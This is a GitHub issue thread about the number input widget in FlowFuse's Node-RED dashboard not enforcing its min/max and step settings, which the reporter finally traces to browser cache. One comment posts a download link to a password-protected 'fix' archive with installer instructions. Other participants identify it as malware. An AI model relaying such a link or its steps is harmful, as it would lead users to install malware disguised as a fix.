### ISSUE TITLE
Number input Range (min-max limits) not working as expected

### ISSUE THREAD

**Issue by mountain181** [FlowFuse/node-red-dashboard#1244]
### Current Behavior

I can put values in number input out of bounds of Range ( min - max) setting. 
![image](https://github.com/user-attachments/assets/93794be3-c142-493a-9b87-5964eb4e7fc2)

EDIT : Also number input widget does not show up in safari
### Expected Behavior

I expect it to limit input value if input is out of bounds. At least not output  out of bounds value. 

### Environment

- Dashboard version: 1.15.0
- Node-RED version: 4.0.2
- Node.js version: 20
- npm version:
- Platform/OS: RT linux arm32 
- Browser: Chrome

### Have you provided an initial effort estimate for this issue?

I have provided an initial effort estimate

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mountain181** [comment]
Warning!!!. Do not download kehkou link. Virus

**Comment by Teto314** [comment]
> Warning!!! Do not download kehkou link. Virus. Github need to fix this
> 
> Edit: Github removed it, be careful for later with comments asking you to download malware

The reason I found this place is because I also just received a link from kehkou, and you were the only one who mentioned this problem.
He cleverly provided an executable file related to gcc (which is also the hardest hit by false positives) Only after I ran it and nothing happened did I realize something was wrong, luckily the antivirus saved me in the end...

**Comment by juanbaldovi** [comment]
Also the step control is not working, it always increments in 1 steps

**Comment by gayanSandamal** [comment]
@mountain181, thank you for reporting this bug with the number input node.

Could you please provide the version of Safari and the OS platform you're using?

![Image](https://github.com/user-attachments/assets/dd148af9-7c28-4e88-b6d0-3be4573aaf56)

Please note that if you're using Safari for Windows, it may cause issues as it was [discontinued in 2010](https://support.apple.com/en-us/102665#:~:text=Apple%20no%20longer%20offers%20Safari,last%20version%20made%20for%20Windows.)

We're continuing to investigate these issues further

**Comment by mountain181** [comment]
@gayanSandamal 
It works for me now as well. I think i had a issue with browser cache. No problems with safari.

**Comment by gayanSandamal** [comment]
> @gayanSandamal It works for me now as well. I think i had a issue with browser cache. No problems with safari.

Thanks for the confirmation @mountain181
